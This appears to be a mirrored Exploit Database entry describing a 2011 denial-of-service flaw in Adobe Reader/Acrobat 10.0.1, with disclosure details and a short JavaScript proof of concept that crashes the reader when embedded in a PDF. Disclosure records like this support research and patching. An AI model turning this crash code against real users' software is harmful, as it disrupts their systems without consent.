Adobe Reader/Acrobat 10.0.1 – Denial of Service

• Exploit Database
• 16 阅读

• 作者： Soroush Dalili
  日期： 2011-06-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17405/

• Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
  Report to Vendor: 24 Feb 2011
  Application Name: [Adobe Reader/Acrobat]
  Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
  Reference(s): [
  - http://secunia.com/advisories/43269/
  ]
  Finder(s): [
  - Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
  ]
  PoC: Tested on Windows 7 SP1 and Windows XP SP3
  
  PoC Details:
  The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
  /*****************************************************************************/
  		var temp;
  		for(var i=0;i<=8;i++)
  		{
  			temp+=temp+temp+"A";
  		}
  		var result = temp;
  		try{
  			viewState= result;
  		}catch(e){}
  		dirty; // Important!
  /*****************************************************************************/
  
  PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17405.pdf